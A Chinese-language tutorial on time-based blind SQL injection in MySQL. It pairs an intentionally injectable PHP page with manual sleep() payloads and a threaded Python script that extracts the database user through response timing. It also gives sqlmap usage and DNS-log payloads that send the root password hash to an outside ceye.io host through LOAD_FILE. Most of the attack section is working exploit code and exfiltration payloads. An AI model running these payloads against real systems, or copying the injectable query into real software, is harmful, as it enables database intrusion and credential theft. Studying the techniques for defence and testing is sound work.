0x00 延遲注入定義
延遲注入,是一種盲注的手法, 提交對執行時間銘感的函數sql語句,通過執行時間的長短來判斷是否執行成功,比如:正確的話會導致時間很長,錯誤的話會導致執行時間很短,這就是所謂的高級盲注.SQLMAP、穿山甲、胡蘿卜等主流注入工具可能檢測不出,只能手工檢測,利用腳本程序跑出結果。
0x01 延遲注入的函數
sleep() //延遲函數
if(condition,true,false) //條件語句
ascii() //轉換成ascii碼
substring("string",strart,length) //mid()也一樣,取出字符串里的第幾位開始,長度多少的字符
If表達式:IF(expr1,expr2,expr3)
如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),則 IF()的返回值為expr2; 否則返回值則為 expr3
Mid函數:MID(column_name,start[,length])
| column_name |
必需。要提取字符的字段。 |
| start |
必需。規定開始位置(起始值是 1)。 |
| length |
可選。要返回的字符數。如果省略,則 MID() 函數返回剩余文本。 |
延時注入的原理就是,所要爆的信息的ascii碼正確時,產生延時,否則不延時
0x02 延遲注入實列
1.含有時間延遲注入代碼
yanchi.php:
<?php header("Content-type:text/html;charset=utf8"); $link = mysql_connect("localhost", "root","root"); mysql_select_db("mysql", $link); mysql_set_charset("utf8"); $sql = "SELECT user FROM user where user='{$_GET['username']}'"; echo $sql; $query = mysql_query($sql); echo "this is a time blode "; ?>
2手工檢查延遲注入
http://10.0.0.21/yanci.php?username=root' and sleep(5)%23
或者
http://10.0.0.21/yanci.php?username=root' and sleep(5) and 'xRsl'='xRsl#
或者
http://10.0.0.21/yanci.php?username=root' and If(ascii(substr(database(),1,1))=114,1,sleep(5))#
如果有注入,則延遲時間很長:
3.通過python腳本來跑(這里跑出用戶名)
#!/usr/bin/env python # -*- coding: utf-8 -*- import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://10.0.0.21/yanci.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1 else: res[str(j)] = 1 def request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req,timeout=2) except Exception ,e: time.sleep(2) return 'timeout' return request.read() def curl(url): try: start = time.clock() requests.get(url) end = time.clock() return int(end) except requests.RequestException as e: print u"errory!" exit() def getLength(): i = 0 while True: print "[+] Checking: %s \r" %i url = "http://10.0.0.21/yanci.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23" html = request(url) verify = 'timeout' if verify in html: print "[+] leng: %s" %i return i i = i + 1 def bin2dec(string_num): return int(string_num, 2) def getData(dataLength): global res data = "" for x in range(dataLength): x = x + 1 #print x threads = [] for j in range(8): result = "" j = j + 1 sb = my_threading(j,x) sb.setDaemon(True) threads.append(sb) #print j for t in threads: t.start() for t in threads: t.join() #print res tmp = "" for i in range(8): tmp = tmp + str(res[str(i+1)]) #print chr(bin2dec(tmp)) res = {} result = chr(bin2dec(tmp)) print result data = data + result sb = None print "[+] ok!" print "[+] result:" + data if __name__ == '__main__': stop = False res = {} length = getLength() getData(length)
4. sqlmap進行延遲注入
sqlmap.py -r q1.txt --dbms=mysql --time-sec=5
5.通過DNS LOG 日志記錄來注入時間盲注
(1)獲取用戶名root的密碼
http://10.0.0.21/yanci.php?username=root' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where user='root' limit 1),'.89mxv7.ceye.io\\foobar'))),1,1)#
(2)dns log記錄為: 這里利用用http://ceye.io的DNS記錄來注入
(3)獲取用戶名root密碼的十六進值
http://10.0.0.21/yanci.php?username=root' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT hex(user())),'.89mxv7.ceye.io\\foobar'))),1,1)#
dns記錄為:
(4)通過小葵工具查詢得知:
